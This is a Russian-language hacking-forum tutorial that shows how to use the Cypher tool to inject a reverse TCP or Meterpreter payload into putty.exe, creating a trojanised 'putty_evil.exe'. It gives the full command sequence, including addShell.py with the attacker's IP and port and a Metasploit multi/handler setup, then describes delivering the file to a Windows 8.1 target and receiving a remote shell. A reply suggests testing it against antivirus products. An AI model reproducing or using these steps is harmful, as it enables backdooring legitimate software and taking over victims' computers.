Взлом Windows PC - Cypher

Приветствую! В этой теме я продемонстрирую взлом удаленного хоста с помощью программы Cypher. Она позволит нам добавить полезную нагрузку в исполняемый файл (программу, игру, и т.д) не нарушая его целостности.

upload_2016-12-10_21-57-36.png


В качестве атакующей системы будет использоваться OS Kali Linux,

upload_2016-12-10_21-57-52.png


в качестве целевой системы Windows 8.1 с актуальными обновлениями.

upload_2016-12-10_21-58-7.png


Итак, вернемся к Cypher, скачиваем ее с Github:

> git clone https://github.com/xan7r/cypher

upload_2016-12-10_21-58-32.png


Выполняем следующие команды:

> cd cypher

> chmod a+x addShell.py

> ls –a

Теперь нам необходимо выбрать исполняемый файл для «вшивания» в него полезной нагрузки, я взял putty.exe. Скопируем Putty в директорию в Cypher.

upload_2016-12-10_21-59-26.png



Теперь выполним следующую команду:

> ./ addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 –p 0

upload_2016-12-10_21-59-50.png


В приведенной команде –p 0 – это тип полезной нагрузки, всего и х в программе доступно 5.

· 0 – windows/shell_reverse_tcp

· 1 – windows/meterpreter/reverse_http

· 2 – windows/meterpreter/reverse_http +PrependMigrate

· 3 – windows/meterpreter/reverse_https

· 4 – windows/meterpreter/reverse_https +PrependMigrate

По итогу получаем файл putty_evil.exe в папке с Cypher.

upload_2016-12-10_22-0-26.png


Теперь настроим на атакующем хосте handler:
> msfconsole
> use multi/handler
> set LPORT 4444
> set LHOST 192.168.0.107
> exploit
upload_2016-12-10_22-1-3.png


Следующим шагом будет доставка файла putty_evil.exe на целевой хост и последующий запуск приложения. После запуска, мы получаем полноценный command shell, на атакующем хосте.

upload_2016-12-10_22-1-46.png


Сменим кодировку командой:

> chcp 65001

upload_2016-12-10_22-2-9.png


Посмотрим подробную информацию о системе:

> systeminfo


upload_2016-12-10_22-2-36.png


Это все. Спасибо за внимание.
 
Нужно потестить на различных антивирусах. А так очень позновательно ;D
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab